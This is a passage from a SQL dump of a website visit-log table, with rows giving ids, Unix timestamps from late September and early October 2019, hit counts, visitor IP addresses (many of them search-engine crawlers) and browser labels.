5.45.207.49','other'),(452814,1569919605,1,1,0,0,'207.46.13.173','other'),(452815,1569919842,1,1,0,0,'95.108.181.104','other'),(452816,1569920612,1,1,0,0,'66.249.66.136','chrome'),(452817,1569920897,1,1,0,0,'213.180.203.44','other'),(452818,1569920931,1,1,0,0,'95.108.181.104','other'),(452819,1569920991,1,1,0,0,'157.55.39.247','other'),(452820,1569921034,1,1,0,0,'37.9.113.33','other'),(452821,1569921075,1,1,0,0,'46.200.14.151','chrome'),(452822,1569921131,1,1,0,0,'207.46.13.173','other'),(452823,1569921549,1,1,0,0,'95.132.44.98','firefox'),(452824,1569921908,1,1,0,0,'178.154.200.71','chrome'),(452825,1569921943,1,1,0,0,'37.9.113.163','other'),(452826,1569922230,1,1,0,0,'66.249.66.134','chrome'),(452827,1569922416,1,1,0,0,'91.196.178.65','chrome'),(452828,1569922779,2,2,0,0,'207.46.13.173','other'),(452829,1569922887,1,1,0,0,'141.8.132.37','chrome'),(452830,1569922940,1,1,0,0,'37.9.113.10','other'),(452831,1569922958,1,1,0,0,'141.8.183.33','other'),(452832,1569923144,1,1,0,0,'66.249.66.132','chrome'),(452833,1569923416,1,1,0,0,'37.9.113.177','other'),(452834,1569923509,2,2,0,0,'66.249.66.134','chrome'),(452835,1569923554,1,1,0,0,'141.8.142.2','other'),(452836,1569923738,1,1,0,0,'109.74.154.72','chrome'),(452837,1569923915,1,1,0,0,'91.196.178.65','chrome'),(452838,1569924074,1,1,0,0,'207.46.13.173','other'),(452839,1569924158,4,4,0,0,'66.249.66.132','chrome'),(452840,1569924241,1,1,0,0,'141.8.132.19','other'),(452841,1569924246,1,1,0,0,'213.180.203.44','other'),(452842,1569924360,1,1,0,0,'91.196.177.134','chrome'),(452843,1569924598,3,3,0,0,'157.55.39.119','other'),(452844,1569924893,2,2,0,0,'157.55.39.247','other'),(452845,1569925124,2,2,0,0,'207.46.13.173','other'),(452846,1569925328,1,1,0,0,'5.45.207.65','other'),(452847,1569925365,1,1,0,0,'91.196.178.29','chrome'),(452848,1569925561,1,1,0,0,'141.8.132.37','other'),(452849,1569925626,1,1,0,0,'66.249.66.132','chrome'),(452850,1569926289,1,1,0,0,'141.8.183.15','other'),(452851,1569926589,1,1,0,0,'207.46.13.173','other'),(452852,1569926780,2,2,0,0,'157.55.39.227','other'),(452853,1569926934,1,1,0,0,'66.249.69.37','chrome'),(452854,1569926974,2,2,0,0,'157.55.39.106','other'),(452855,1569927270,1,1,0,0,'91.196.178.18','chrome'),(452856,1569927392,1,1,0,0,'91.209.11.236','other'),(452857,1569927461,1,1,0,0,'141.8.132.12','other'),(452858,1569927602,1,1,0,0,'66.249.66.132','chrome'),(452859,1569927688,2,2,0,0,'157.55.39.227','other'),(452860,1569927885,1,1,0,0,'8.29.198.26','other'),(452861,1569927934,1,1,0,0,'66.249.66.134','chrome'),(452862,1569928080,1,1,0,0,'8.29.198.25','other'),(452863,1569928157,1,1,0,0,'162.243.162.201','other'),(452864,1569928214,1,1,0,0,'141.8.183.33','other'),(452865,1569928245,2,2,0,0,'207.46.13.173','other'),(452866,1569928308,3,3,0,0,'157.55.39.106','other'),(452867,1569928416,1,1,0,0,'141.8.132.37','other'),(452868,1569928462,1,1,0,0,'46.211.106.67','chrome'),(452869,1569928491,1,1,0,0,'91.196.178.93','firefox'),(452870,1569928626,1,1,0,0,'207.46.13.220','other'),(452871,1569929240,1,1,0,0,'141.8.142.50','other'),(452872,1569929547,1,1,0,0,'157.55.39.227','other'),(452873,1569929612,1,1,0,0,'66.249.66.136','chrome'),(452874,1569929857,1,1,0,0,'66.249.66.134','chrome'),(452875,1569930065,1,1,0,0,'207.46.13.173','other'),(452876,1569930967,1,1,0,0,'66.249.66.134','chrome'),(452877,1569931796,1,1,0,0,'157.55.39.106','other'),(452878,1569931975,2,2,0,0,'157.55.39.227','other'),(452879,1569932376,1,1,0,0,'162.243.162.201','firefox'),(452880,1569932786,1,1,0,0,'141.8.142.177','other'),(452881,1569933282,1,1,0,0,'157.55.39.227','other'),(452882,1569933290,1,1,0,0,'66.249.66.88','chrome'),(452883,1569933735,2,2,0,0,'162.243.162.201','firefox'),(452884,1569934056,1,1,0,0,'91.124.239.46','chrome'),(452885,1569934126,1,1,0,0,'213.180.203.37','other'),(452886,1569934318,1,1,0,0,'157.55.39.227','other'),(452887,1569934536,1,1,0,0,'91.196.178.65','chrome'),(452888,1569934560,1,1,0,0,'178.154.200.60','other'),(452889,1569934757,1,1,0,0,'207.46.13.220','other'),(452890,1569934811,1,1,0,0,'207.46.13.173','other'),(452891,1569935161,1,1,0,0,'37.54.7.175','chrome'),(452892,1569935209,1,1,0,0,'91.209.11.236','other'),(452893,1569936075,2,2,0,0,'157.55.39.227','other'),(452894,1569936107,1,1,0,0,'66.249.66.132','chrome'),(452895,1569936137,1,1,0,0,'91.196.178.65','chrome'),(452896,1569936511,1,1,0,0,'162.243.162.201','firefox'),(452897,1569936697,1,1,0,0,'91.196.178.18','chrome'),(452898,1569936950,1,1,0,0,'66.249.66.136','chrome'),(452899,1569937069,1,1,0,0,'141.8.142.177','other'),(452900,1569937527,1,1,0,0,'178.154.200.60','other'),(452901,1569937619,1,1,0,0,'141.8.142.115','other'),(452902,1569937751,2,2,0,0,'162.243.162.201','firefox'),(452903,1569937775,1,1,0,0,'66.249.66.132','chrome'),(452904,1569937985,1,1,0,0,'207.46.13.220','other'),(452905,1569938154,2,2,0,0,'66.249.66.134','chrome'),(452906,1569938453,1,1,0,0,'66.249.66.136','chrome'),(452907,1569938752,1,1,0,0,'8.29.198.26','other'),(452908,1569938829,1,1,0,0,'207.46.13.16','other'),(452909,1569938933,1,1,0,0,'8.29.198.27','other'),(452910,1569939356,1,1,0,0,'207.46.13.192','other'),(452911,1569940187,1,1,0,0,'66.249.66.132','chrome'),(452912,1569940524,1,1,0,0,'141.8.142.161','other'),(452913,1569941193,1,1,0,0,'141.8.188.12','other'),(452914,1569941196,1,1,0,0,'162.243.162.201','firefox'),(452915,1569941213,1,1,0,0,'5.45.207.65','other'),(452916,1569941230,1,1,0,0,'141.8.142.177','other'),(452917,1569942109,1,1,0,0,'34.68.239.71','chrome'),(452918,1569942204,1,1,0,0,'185.41.248.190','chrome'),(452919,1569942353,2,2,0,0,'141.8.183.33','other'),(452920,1569942775,1,1,0,0,'91.196.178.46','chrome'),(452921,1569943626,1,1,0,0,'5.45.207.65','chrome'),(452922,1569943673,1,1,0,0,'162.243.162.201','firefox'),(452923,1569944295,1,1,0,0,'66.249.66.134','chrome'),(452924,1569944427,1,1,0,0,'37.9.113.33','other'),(452925,1569944439,1,1,0,0,'141.8.188.25','other'),(452926,1569944911,1,1,0,0,'91.196.178.179','chrome'),(452927,1569945350,1,1,0,0,'91.196.178.93','chrome'),(452928,1569945420,1,1,0,0,'95.108.181.104','other'),(452929,1569945423,2,2,0,0,'37.9.113.163','other'),(452930,1569945428,1,1,0,0,'95.108.213.55','other'),(452931,1569945485,1,1,0,0,'66.249.66.134','chrome'),(452932,1569946112,2,2,0,0,'207.46.13.36','other'),(452933,1569946778,1,1,0,0,'66.249.66.136','chrome'),(452934,1569947128,2,2,0,0,'207.46.13.220','other'),(452935,1569947580,2,2,0,0,'162.243.162.201','firefox'),(452936,1569948493,1,1,0,0,'66.249.66.134','chrome'),(452937,1569948608,1,1,0,0,'13.66.139.0','other'),(452938,1569948707,1,1,0,0,'141.8.142.2','other'),(452939,1569948748,1,1,0,0,'178.154.200.71','other'),(452940,1569948762,1,1,0,0,'66.249.66.132','chrome'),(452941,1569949434,3,3,0,0,'162.243.162.201','firefox'),(452942,1569949629,2,2,0,0,'8.29.198.26','other'),(452943,1569949981,1,1,0,0,'207.46.13.36','other'),(452944,1569950032,3,3,0,0,'207.46.13.8','other'),(452945,1569951140,1,1,0,0,'207.46.13.36','other'),(452946,1569951148,1,1,0,0,'162.243.162.201','firefox'),(452947,1569951177,1,1,0,0,'213.180.203.37','other'),(452948,1569952040,1,1,0,0,'66.249.66.134','chrome'),(452949,1569952403,1,1,0,0,'157.55.39.95','other'),(452950,1569952776,2,2,0,0,'207.46.13.36','other'),(452951,1569952879,1,1,0,0,'46.211.99.16','chrome'),(452952,1569952976,1,1,0,0,'66.249.66.132','chrome'),(452953,1569953788,2,2,0,0,'162.243.162.201','firefox'),(452954,1569955533,1,1,0,0,'207.46.13.8','other'),(452955,1569956445,1,1,0,0,'173.193.191.202','firefox'),(452956,1569958354,1,1,0,0,'66.249.66.134','chrome'),(452957,1569960108,1,1,0,0,'66.249.66.132','chrome'),(452958,1569960487,1,1,0,0,'8.29.198.25','other'),(452959,1569960656,1,1,0,0,'8.29.198.26','other'),(452960,1569960785,1,1,0,0,'66.249.66.136','chrome'),(452961,1569960881,1,1,0,0,'66.249.66.88','chrome'),(452962,1569961792,1,1,0,0,'66.249.66.132','chrome'),(452963,1569965301,1,1,0,0,'207.46.13.192','other'),(452964,1569967217,1,1,0,0,'207.46.13.118','other'),(452965,1569968141,1,1,0,0,'162.243.162.201','firefox'),(452966,1569969379,1,1,0,0,'162.243.162.201','firefox'),(452967,1569970486,1,1,0,0,'207.46.13.192','other'),(452968,1569971346,1,1,0,0,'8.29.198.26','other'),(452969,1569971504,1,1,0,0,'8.29.198.27','other'),(452970,1569972704,1,1,0,0,'207.46.13.113','other'),(452971,1569972808,6,6,0,0,'207.46.13.192','other'),(452972,1569972960,1,1,0,0,'141.8.142.161','other'),(452973,1569973141,5,5,0,0,'207.46.13.118','other'),(452974,1569973855,1,1,0,0,'162.243.162.201','firefox'),(452975,1569973917,1,1,0,0,'157.55.39.252','other'),(452976,1569974079,2,2,0,0,'207.46.13.192','other'),(452977,1569974117,1,1,0,0,'62.205.134.182','other'),(452978,1569974365,1,1,0,0,'13.66.139.0','other'),(452979,1569975259,2,2,0,0,'213.180.203.44','other'),(452980,1569975581,1,1,0,0,'141.8.132.2','other'),(452981,1569975654,1,1,0,0,'5.45.207.49','other'),(452982,1569975658,2,2,0,0,'162.243.162.201','firefox'),(452983,1569977111,1,1,0,0,'207.46.13.118','other'),(452984,1569977509,1,1,0,0,'141.8.142.164','other'),(452985,1569977821,1,1,0,0,'213.180.203.37','other'),(452986,1569978103,2,2,0,0,'162.243.162.201','firefox'),(452987,1569978413,1,1,0,0,'66.249.66.132','chrome'),(452988,1569979618,1,1,0,0,'213.180.203.37','other'),(452989,1569980039,1,1,0,0,'37.113.37.111','chrome'),(452990,1569980965,1,1,0,0,'66.249.66.134','chrome'),(452991,1569981590,1,1,0,0,'141.8.142.2','other'),(452992,1569981628,1,1,0,0,'37.9.113.10','other'),(452993,1569981667,1,1,0,0,'141.8.183.15','other'),(452994,1569982033,1,1,0,0,'66.249.66.134','chrome'),(452995,1569982215,1,1,0,0,'8.29.198.27','other'),(452996,1569982365,1,1,0,0,'8.29.198.25','other'),(452997,1569984061,1,1,0,0,'66.249.66.88','chrome'),(452998,1569984556,1,1,0,0,'66.249.66.134','chrome'),(452999,1569985298,1,1,0,0,'213.180.203.44','other'),(453000,1569985394,2,2,0,0,'37.57.218.190','firefox'),(453001,1569985702,1,1,0,0,'66.249.66.88','chrome'),(453002,1569985964,1,1,0,0,'69.4.87.74','other'),(453004,1569986223,1,1,0,0,'207.46.13.192','other'),(453005,1569986273,1,1,0,0,'213.180.203.37','other'),(453006,1569986556,3,3,0,0,'207.46.13.7','other'),(453007,1569987099,1,1,0,0,'141.8.142.2','other'),(453008,1569987379,3,3,0,0,'207.46.13.144','other'),(453009,1569987776,1,0,1,0,'66.249.66.132',''),(453010,1569988278,1,1,0,0,'178.154.200.33','other'),(453011,1569988705,1,1,0,0,'66.249.66.136','chrome'),(453012,1569988809,1,1,0,0,'207.46.13.144','other'),(453013,1569989035,1,1,0,0,'213.180.203.37','other'),(453014,1569989070,1,1,0,0,'207.46.13.7','other'),(453015,1569989215,1,1,0,0,'93.119.227.91','other'),(453017,1569989937,2,2,0,0,'213.180.203.44','other'),(453018,1569990450,1,1,0,0,'93.119.227.34','other'),(453019,1569990453,1,1,0,0,'93.119.227.34','firefox'),(453020,1569990953,1,1,0,0,'52.58.51.176','other'),(453021,1569990981,1,1,0,0,'213.180.203.44','other'),(453022,1569991510,1,1,0,0,'62.205.134.182','other'),(453023,1569991600,2,2,0,0,'69.4.89.106','other'),(453024,1569991916,1,1,0,0,'141.8.142.2','other'),(453025,1569991978,1,1,0,0,'169.57.65.165','firefox'),(453026,1569992005,1,1,0,0,'213.180.203.37','other'),(453027,1569992031,1,1,0,0,'169.57.65.172','firefox'),(453028,1569992131,1,1,0,0,'66.249.66.88','chrome'),(453029,1569992759,1,1,0,0,'91.196.178.135','firefox'),(453030,1569992767,2,2,0,0,'95.76.39.109','other'),(453031,1569992974,1,1,0,0,'213.180.203.37','other'),(453032,1569993068,2,2,0,0,'8.29.198.26','other'),(453033,1569994255,1,1,0,0,'91.196.178.65','chrome'),(453034,1569994614,1,1,0,0,'157.55.39.102','other'),(453035,1569994765,2,2,0,0,'213.180.203.44','other'),(453036,1569994844,1,1,0,0,'66.249.66.136','chrome'),(453037,1569995341,1,1,0,0,'13.66.139.0','other'),(453038,1569996072,2,2,0,0,'66.249.66.88','chrome'),(453039,1569996382,1,1,0,0,'95.133.212.104','chrome'),(453040,1569996825,1,1,0,0,'178.154.200.33','other'),(453041,1569997555,1,1,0,0,'178.154.200.71','other'),(453042,1569998558,1,1,0,0,'91.196.178.65','chrome'),(453043,1569999880,1,1,0,0,'91.196.178.29','chrome'),(453044,1570000059,1,1,0,0,'213.180.203.44','other'),(453045,1570000287,1,1,0,0,'207.46.13.7','other'),(453046,1570000901,1,1,0,0,'157.55.39.102','other'),(453047,1570001581,1,1,0,0,'91.196.178.29','chrome'),(453048,1570002511,1,1,0,0,'66.249.66.136','chrome'),(453049,1570002652,1,1,0,0,'213.180.203.37','other'),(453050,1570003191,1,1,0,0,'207.46.13.15','other'),(453051,1570003295,1,1,0,0,'179.43.134.154','msie'),(453052,1570003883,1,1,0,0,'162.243.162.201','firefox'),(453053,1570003919,1,1,0,0,'8.29.198.25','other'),(453054,1570004059,1,1,0,0,'8.29.198.26','other'),(453055,1570004251,2,2,0,0,'141.8.142.2','other'),(453056,1570004448,1,1,0,0,'173.212.233.72','chrome'),(453057,1570004596,1,1,0,0,'66.249.66.136','chrome'),(453058,1570005590,1,1,0,0,'162.243.162.201','firefox'),(453059,1570005866,1,1,0,0,'66.249.66.132','chrome'),(453060,1570006434,2,2,0,0,'213.180.203.44','other'),(453061,1570006553,1,1,0,0,'87.250.224.90','other'),(453062,1570006815,1,1,0,0,'66.249.66.132','chrome'),(453063,1570007420,1,1,0,0,'128.124.199.247','chrome'),(453064,1570007997,1,1,0,0,'207.46.13.148','other'),(453065,1570008047,1,1,0,0,'162.243.162.201','firefox'),(453066,1570008295,1,1,0,0,'213.180.203.37','other'),(453067,1570008314,1,1,0,0,'87.250.224.90','other'),(453068,1570008400,1,1,0,0,'66.249.66.134','chrome'),(453069,1570008426,1,1,0,0,'66.249.66.132','chrome'),(453070,1570009283,1,1,0,0,'46.211.74.141','chrome'),(453071,1570009285,1,1,0,0,'66.249.83.201','chrome'),(453072,1570009294,1,1,0,0,'66.249.83.197','chrome'),(453073,1570009295,1,1,0,0,'66.102.8.90','chrome'),(453074,1570009825,1,1,0,0,'66.249.66.132','chrome'),(453075,1570009901,3,3,0,0,'18.224.31.176','chrome'),(453076,1570010324,1,1,0,0,'213.180.203.37','other'),(453077,1570010470,1,1,0,0,'66.249.66.134','chrome'),(453078,1570010848,1,1,0,0,'37.55.57.127','chrome'),(453079,1570011302,1,1,0,0,'207.46.13.15','other'),(453080,1570011374,1,1,0,0,'213.180.203.44','other'),(453081,1570011755,1,1,0,0,'66.249.66.132','chrome'),(453082,1570011872,1,1,0,0,'66.249.66.134','chrome'),(453083,1570012330,1,1,0,0,'185.12.7.112','chrome'),(453084,1570013013,1,1,0,0,'207.46.13.7','other'),(453085,1570013069,2,2,0,0,'95.213.141.126','opera'),(453086,1570013195,2,2,0,0,'162.243.162.201','firefox'),(453087,1570013464,2,2,0,0,'213.180.203.37','other'),(453088,1570013541,1,1,0,0,'207.46.13.144','other'),(453089,1570013711,1,1,0,0,'109.74.154.72','chrome'),(453090,1570014233,1,1,0,0,'37.52.42.216','chrome'),(453091,1570014559,1,1,0,0,'207.46.13.7','other'),(453092,1570014760,2,2,0,0,'8.29.198.25','other'),(453093,1570014829,1,1,0,0,'66.249.64.27','chrome'),(453094,1570015934,1,1,0,0,'66.249.64.33','chrome'),(453095,1570016753,7,7,0,0,'66.249.88.164','chrome'),(453096,1570016758,1,1,0,0,'66.249.88.161','chrome'),(453097,1570016761,2,2,0,0,'66.249.88.191','chrome'),(453098,1570016763,1,1,0,0,'46.211.64.168','chrome'),(453099,1570016774,1,1,0,0,'66.102.9.191','chrome'),(453100,1570016776,1,1,0,0,'66.102.9.161','chrome'),(453101,1570016777,1,1,0,0,'66.102.9.164','chrome'),(453102,1570016799,3,3,0,0,'66.249.83.201','chrome'),(453103,1570016800,1,1,0,0,'66.249.83.199','chrome'),(453104,1570017452,1,1,0,0,'66.249.64.27','chrome'),(453105,1570018709,1,1,0,0,'91.196.178.65','chrome'),(453106,1570019330,1,1,0,0,'66.249.64.27','chrome'),(453107,1570019791,1,1,0,0,'213.180.203.44','other'),(453108,1570021160,1,1,0,0,'141.8.142.2','other'),(453109,1570021165,2,2,0,0,'213.180.203.37','other'),(453110,1570021274,1,1,0,0,'77.111.244.79','chrome'),(453111,1570022608,1,1,0,0,'213.180.203.44','other'),(453112,1570022767,1,1,0,0,'162.243.162.201','firefox'),(453113,1570023762,1,1,0,0,'162.243.162.201','firefox'),(453114,1570024209,1,1,0,0,'213.180.203.44','other'),(453115,1570024355,1,1,0,0,'178.154.200.33','other'),(453116,1570024549,1,1,0,0,'213.180.203.37','other'),(453117,1570025178,1,1,0,0,'162.243.162.201','firefox'),(453118,1570025629,1,1,0,0,'8.29.198.27','other'),(453119,1570025778,1,1,0,0,'8.29.198.26','other'),(453120,1570026437,1,1,0,0,'141.8.132.19','other'),(453121,1570026685,1,1,0,0,'141.8.188.25','other'),(453122,1570027506,1,1,0,0,'162.243.162.201','firefox'),(453123,1570028419,3,3,0,0,'162.243.162.201','firefox'),(453124,1570028532,1,1,0,0,'141.8.142.164','other'),(453125,1570028769,3,3,0,0,'34.68.158.88','chrome'),(453126,1570028933,3,3,0,0,'35.188.68.48','chrome'),(453127,1570028968,3,3,0,0,'35.192.168.249','chrome'),(453128,1570028981,6,6,0,0,'104.198.205.205','chrome'),(453130,1570029566,1,1,0,0,'162.243.162.201','firefox'),(453131,1570031941,1,1,0,0,'37.9.113.177','other'),(453132,1570032003,1,1,0,0,'141.8.132.12','other'),(453133,1570032295,1,1,0,0,'66.249.64.33','chrome'),(453134,1570033217,1,1,0,0,'66.249.64.28','chrome'),(453135,1570033492,1,1,0,0,'178.154.171.7','other'),(453136,1570034052,1,1,0,0,'66.249.64.33','chrome'),(453137,1570034085,2,2,0,0,'66.249.64.27','chrome'),(453138,1570035187,1,1,0,0,'5.45.207.65','other'),(453139,1570035215,1,1,0,0,'141.8.188.25','other'),(453140,1570035263,1,1,0,0,'141.8.132.19','other'),(453141,1570035271,3,3,0,0,'157.55.39.157','other'),(453142,1570035385,1,1,0,0,'207.46.13.126','other'),(453143,1570035726,1,1,0,0,'66.249.64.27','chrome'),(453144,1570035762,1,1,0,0,'91.196.178.75','firefox'),(453145,1570036027,1,1,0,0,'157.55.39.75','other'),(453146,1570036487,1,1,0,0,'8.29.198.27','other'),(453147,1570036555,1,1,0,0,'91.196.121.13','chrome'),(453148,1570036640,1,1,0,0,'8.29.198.25','other'),(453149,1570037227,1,1,0,0,'141.8.142.177','other'),(453150,1570037630,1,1,0,0,'207.46.13.126','other'),(453151,1570038417,1,1,0,0,'66.249.64.26','chrome'),(453152,1570038567,1,1,0,0,'141.8.188.38','other'),(453153,1570038789,1,1,0,0,'141.8.183.15','other'),(453154,1570038877,1,1,0,0,'207.46.13.126','other'),(453155,1570039410,4,4,0,0,'157.55.39.157','other'),(453156,1570039829,1,1,0,0,'5.45.207.65','other'),(453157,1570040032,1,1,0,0,'207.46.13.241','other'),(453158,1570040348,1,1,0,0,'207.46.13.126','other'),(453159,1570040404,1,1,0,0,'37.73.200.38','chrome'),(453160,1570041501,1,1,0,0,'130.180.219.155','chrome'),(453161,1570041708,1,1,0,0,'141.8.188.25','other'),(453162,1570041747,1,1,0,0,'95.108.213.39','other'),(453163,1570041808,1,1,0,0,'66.249.64.62','chrome'),(453164,1570041851,1,1,0,0,'66.249.64.26','chrome'),(453165,1570041905,1,1,0,0,'207.46.13.126','other'),(453166,1570042017,2,2,0,0,'157.55.39.157','other'),(453167,1570042312,1,1,0,0,'66.249.64.33','chrome'),(453168,1570043187,1,1,0,0,'141.8.142.2','other'),(453169,1570043547,1,1,0,0,'207.46.13.126','other'),(453170,1570043550,1,1,0,0,'66.249.64.26','chrome'),(453171,1570043870,1,1,0,0,'213.180.203.37','other'),(453172,1570044292,1,1,0,0,'157.55.39.157','other'),(453173,1570044495,1,1,0,0,'141.8.142.2','other'),(453174,1570045136,3,3,0,0,'213.180.203.44','other'),(453175,1570045225,1,1,0,0,'217.69.143.217','firefox'),(453176,1570045912,1,1,0,0,'207.46.13.126','other'),(453177,1570046216,1,1,0,0,'213.180.203.44','other'),(453178,1570047290,1,1,0,0,'66.249.66.134','chrome'),(453179,1570047366,1,1,0,0,'8.29.198.26','other'),(453180,1570047518,1,1,0,0,'8.29.198.25','other'),(453181,1570047800,1,1,0,0,'51.77.246.200','other'),(453182,1570047844,1,1,0,0,'213.180.203.44','other'),(453183,1570048916,2,2,0,0,'157.55.39.157','other'),(453184,1570049735,1,1,0,0,'207.46.13.241','other'),(453185,1570050581,2,2,0,0,'157.55.39.157','other'),(453186,1570050671,1,1,0,0,'141.8.142.2','other'),(453187,1570050674,1,1,0,0,'213.180.203.37','other'),(453188,1570051750,1,1,0,0,'213.180.203.44','other'),(453189,1570051772,1,1,0,0,'141.8.142.2','other'),(453190,1570051815,1,1,0,0,'213.180.203.37','other'),(453191,1570052224,1,1,0,0,'66.249.66.136','chrome'),(453192,1570054086,1,1,0,0,'157.55.39.157','other'),(453193,1570054593,1,1,0,0,'213.180.203.37','other'),(453194,1570055317,1,1,0,0,'157.55.39.180','other'),(453195,1570056741,1,1,0,0,'213.180.203.44','other'),(453196,1570056969,1,1,0,0,'207.46.13.2','other'),(453197,1570057560,1,1,0,0,'157.55.39.180','other'),(453198,1570057580,1,1,0,0,'213.180.203.37','other'),(453199,1570057620,1,1,0,0,'157.55.39.181','other'),(453200,1570057658,2,2,0,0,'213.180.203.44','other'),(453201,1570058224,2,2,0,0,'8.29.198.27','other'),(453202,1570059147,1,1,0,0,'178.154.200.33','other'),(453203,1570059439,1,1,0,0,'213.180.203.44','other'),(453204,1570060513,1,1,0,0,'62.205.134.182','other'),(453205,1570060912,1,1,0,0,'157.55.39.181','other'),(453206,1570061323,1,1,0,0,'157.55.39.242','other'),(453207,1570061933,3,3,0,0,'157.55.39.180','other'),(453208,1570062797,1,1,0,0,'157.55.39.181','other'),(453209,1570064219,1,1,0,0,'207.46.13.2','other'),(453210,1570065604,1,1,0,0,'13.66.139.0','other'),(453211,1570066424,1,1,0,0,'157.55.39.181','other'),(453212,1570066908,1,1,0,0,'157.55.39.180','other'),(453213,1570067845,3,3,0,0,'157.55.39.180','other'),(453214,1570068888,3,3,0,0,'157.55.39.181','other'),(453215,1570069032,1,1,0,0,'157.55.39.180','other'),(453216,1570069084,2,2,0,0,'8.29.198.25','other'),(453217,1570069419,1,1,0,0,'176.14.37.74','msie'),(453218,1570069966,1,1,0,0,'157.55.39.181','other'),(453219,1570070369,1,1,0,0,'207.46.13.2','other'),(453220,1570070516,1,1,0,0,'66.249.66.132','chrome'),(453221,1570070952,1,1,0,0,'66.249.66.134','chrome'),(453222,1570072435,1,1,0,0,'157.55.39.181','other'),(453223,1570072991,1,1,0,0,'66.249.66.132','chrome'),(453224,1570073602,1,1,0,0,'66.249.66.134','chrome'),(453225,1570073606,2,2,0,0,'157.55.39.180','other'),(453226,1570073655,1,1,0,0,'207.46.13.199','other'),(453227,1570074575,1,1,0,0,'46.211.100.90','chrome'),(453228,1570074683,1,1,0,0,'207.46.13.2','other'),(453229,1570075130,1,1,0,0,'66.249.66.136','chrome'),(453230,1570075564,1,1,0,0,'66.249.66.134','chrome'),(453231,1570075771,1,1,0,0,'207.46.13.32','other'),(453232,1570076611,3,3,0,0,'207.46.13.199','other'),(453233,1570076627,1,1,0,0,'157.55.39.180','other'),(453234,1570077261,1,1,0,0,'66.249.66.132','chrome'),(453235,1570077513,1,1,0,0,'157.55.39.141','other'),(453236,1570077899,1,1,0,0,'62.205.134.182','other'),(453237,1570079753,1,1,0,0,'157.55.39.180','other'),(453238,1570079923,2,2,0,0,'8.29.198.27','other'),(453239,1570081104,1,1,0,0,'91.229.121.3','chrome'),(453240,1570082393,2,2,0,0,'157.55.39.100','other'),(453241,1570083756,2,2,0,0,'66.249.66.132','chrome'),(453242,1570083782,1,1,0,0,'66.249.66.136','chrome'),(453243,1570084448,2,2,0,0,'66.249.66.86','chrome'),(453244,1570085075,1,1,0,0,'66.249.66.136','chrome'),(453245,1570085169,1,1,0,0,'157.55.39.100','other'),(453246,1570085543,1,1,0,0,'91.196.178.65','chrome'),(453247,1570086428,1,1,0,0,'207.46.13.219','other'),(453248,1570086712,2,2,0,0,'66.249.66.136','chrome'),(453249,1570086816,4,4,0,0,'66.249.66.134','chrome'),(453250,1570087009,1,1,0,0,'157.55.39.185','other'),(453251,1570087495,1,1,0,0,'66.249.66.132','chrome'),(453252,1570087589,1,1,0,0,'194.88.152.49','chrome'),(453253,1570089118,1,1,0,0,'91.196.177.207','chrome'),(453254,1570090295,1,1,0,0,'157.55.39.100','other'),(453255,1570090783,1,1,0,0,'8.29.198.27','other'),(453256,1570090932,1,1,0,0,'8.29.198.26','other'),(453257,1570091062,1,1,0,0,'157.55.39.242','other'),(453258,1570092048,1,1,0,0,'178.154.171.66','other'),(453259,1570092623,1,1,0,0,'157.55.39.100','other'),(453260,1570092764,1,1,0,0,'198.16.66.100','chrome'),(453261,1570092914,1,1,0,0,'66.249.66.134','chrome'),(453262,1570093624,1,1,0,0,'91.196.178.65','chrome'),(453263,1570094608,1,1,0,0,'91.196.178.65','chrome'),(453264,1570094652,1,1,0,0,'178.171.106.35','chrome'),(453265,1570095048,1,1,0,0,'157.55.39.100','other'),(453266,1570096328,1,1,0,0,'207.46.13.219','other'),(453267,1570096961,1,1,0,0,'141.8.142.164','other'),(453268,1570097514,4,4,0,0,'207.46.13.198','other'),(453269,1570097516,2,2,0,0,'13.66.139.0','other'),(453270,1570098133,1,1,0,0,'141.8.188.18','other'),(453271,1570098668,1,1,0,0,'66.249.66.136','chrome'),(453272,1570098751,1,1,0,0,'178.154.171.7','other'),(453273,1570099406,2,2,0,0,'207.46.13.198','other'),(453274,1570100183,1,1,0,0,'109.74.154.72','chrome'),(453275,1570100730,1,1,0,0,'141.8.142.119','other'),(453276,1570101263,2,2,0,0,'157.55.39.100','other'),(453277,1570101267,1,1,0,0,'157.55.39.242','other'),(453278,1570101279,2,2,0,0,'207.46.13.198','other'),(453279,1570101450,1,1,0,0,'37.55.151.103','chrome'),(453280,1570101623,1,1,0,0,'8.29.198.26','other'),(453281,1570101794,1,1,0,0,'8.29.198.27','other'),(453282,1570102205,1,1,0,0,'66.249.66.86','chrome'),(453283,1570103534,1,1,0,0,'66.249.66.88','chrome'),(453284,1570104790,1,1,0,0,'92.112.231.41','chrome'),(453285,1570105235,1,1,0,0,'128.124.93.60','chrome'),(453286,1570105470,1,1,0,0,'157.55.39.242','other'),(453287,1570105516,2,2,0,0,'157.55.39.255','other'),(453288,1570105524,1,1,0,0,'91.196.178.169','chrome'),(453289,1570106000,1,1,0,0,'207.46.13.84','other'),(453290,1570106010,1,1,0,0,'207.46.13.92','other'),(453291,1570106032,1,1,0,0,'66.249.66.132','chrome'),(453292,1570107050,2,2,0,0,'157.55.39.242','other'),(453293,1570107684,2,2,0,0,'207.46.13.40','other'),(453294,1570108419,1,1,0,0,'91.196.178.169','chrome'),(453295,1570108637,1,1,0,0,'195.49.149.35','chrome'),(453296,1570108863,1,1,0,0,'66.249.66.136','chrome'),(453297,1570109432,1,1,0,0,'141.8.142.119','other'),(453298,1570110228,1,1,0,0,'66.249.66.136','chrome'),(453299,1570111558,1,1,0,0,'77.222.143.222','msie'),(453300,1570111883,1,1,0,0,'66.249.66.132','chrome'),(453301,1570112502,1,1,0,0,'8.29.198.27','other'),(453302,1570112655,1,1,0,0,'8.29.198.25','other'),(453303,1570113091,1,1,0,0,'207.46.13.6','other'),(453304,1570113570,1,1,0,0,'66.249.66.86','chrome'),(453305,1570113959,1,1,0,0,'66.249.66.134','chrome'),(453306,1570114756,1,1,0,0,'66.249.66.88','chrome'),(453307,1570115019,1,1,0,0,'66.249.66.134','chrome'),(453308,1570115240,3,3,0,0,'35.238.101.236','chrome'),(453309,1570115251,1,1,0,0,'34.67.67.246','chrome'),(453310,1570115252,2,2,0,0,'34.67.67.246','chrome'),(453311,1570115270,1,1,0,0,'141.8.142.50','other'),(453312,1570115510,1,1,0,0,'66.249.66.136','chrome'),(453313,1570117780,1,1,0,0,'185.30.202.91','chrome'),(453314,1570117783,1,1,0,0,'141.8.142.164','other'),(453315,1570118264,1,1,0,0,'95.108.213.3','other'),(453316,1570118296,1,1,0,0,'95.108.213.61','other'),(453317,1570118326,1,1,0,0,'141.8.142.128','other'),(453318,1570118344,1,1,0,0,'66.249.66.132','chrome'),(453319,1570118398,1,1,0